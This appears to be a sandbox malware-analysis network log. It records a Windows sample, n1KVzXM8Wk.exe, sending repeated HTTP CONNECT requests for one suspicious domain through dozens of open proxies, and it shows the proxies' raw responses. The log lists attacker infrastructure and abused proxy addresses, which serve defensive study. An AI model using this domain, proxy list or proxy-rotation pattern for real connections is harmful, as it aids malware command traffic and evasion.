                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.396548986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.483895063 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      831192.168.2.451714202.154.18.13680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.399101973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.862075090 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      832192.168.2.45259746.36.70.104469646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.402724028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      833192.168.2.452480103.212.95.253413636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.409538984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      834192.168.2.45259545.11.95.16560316812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.415981054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      835192.168.2.45259379.143.187.58389716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.421592951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.975044966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      836192.168.2.45256877.77.64.12031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.426255941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.853471994 CET92INHTTP/1.0 200 Connection established
                                                                                                      Proxy-agent: Kerio Control/9.3.6 patch 1 build 5808


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      837192.168.2.45263644.190.9.65481006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.427602053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      838192.168.2.449837159.65.245.255806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.434027910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.470436096 CET467INHTTP/1.1 403 Forbidden
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Server: Apache/2.4.18 (Ubuntu)
                                                                                                      Content-Length: 306
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      839192.168.2.452622146.59.2.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.457720995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      840192.168.2.45263151.210.223.930006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.464210033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      841192.168.2.45251443.255.113.23280836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.491748095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.365705967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.475068092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.844804049 CET208INHTTP/1.0 404 Not Found
                                                                                                      Server: HCS
                                                                                                      Date: Fri, 23 Feb 2024 11:33:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 432
                                                                                                      HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                                      X-NGAA: MISS from CH-XW-NO1-315.3
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      842192.168.2.452045162.241.74.136423946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.491925955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680313110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680691004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.682018995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.684233904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.709306002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:10.756189108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      843192.168.2.45254543.133.80.236156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.492060900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      844192.168.2.45134142.200.196.20880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.497499943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680301905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.822295904 CET72INHTTP/1.1 200 Connection Established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      845192.168.2.45196370.166.167.55577456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.498109102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      846192.168.2.452555103.118.46.6180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.519311905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      847192.168.2.449850185.129.250.183267776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.520443916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.615314960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.716538906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.741286993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.740540028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.740725040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:10.818698883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      848192.168.2.452589103.164.106.9856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.537245035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      849192.168.2.452036189.240.60.16890906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.537405014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.727111101 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      850192.168.2.449820188.165.237.26529826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.537559986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680458069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680691004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.682018995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.684252024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.709347010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:10.756189108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      851192.168.2.452065189.240.60.16490906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.540991068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.730848074 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      852192.168.2.452620200.43.231.841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.546226025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      853192.168.2.45265172.206.181.10341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.547768116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      854192.168.2.452641212.31.100.13841536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.547837973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      855192.168.2.451884123.108.98.8956786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.547914028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      856192.168.2.451897103.200.135.23041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.547916889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      857192.168.2.452013141.94.174.6133266812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.548105955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      858192.168.2.451973162.240.22.169320606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.548196077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680442095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680661917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      859192.168.2.451925171.244.140.160537496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.558896065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.615282059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      860192.168.2.45210495.111.227.164356836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.559531927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      861192.168.2.451944207.180.198.241252796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.566112041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680577040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680660009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.682027102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.684288979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.709456921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:10.756201029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      862192.168.2.4526188.213.129.2030806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.566335917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.880000114 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      863192.168.2.451976167.86.69.142493696812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.570255995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680471897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680661917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      864192.168.2.45263058.234.116.19781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.579087019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      865192.168.2.452652138.0.207.18383286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.581155062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.178184032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
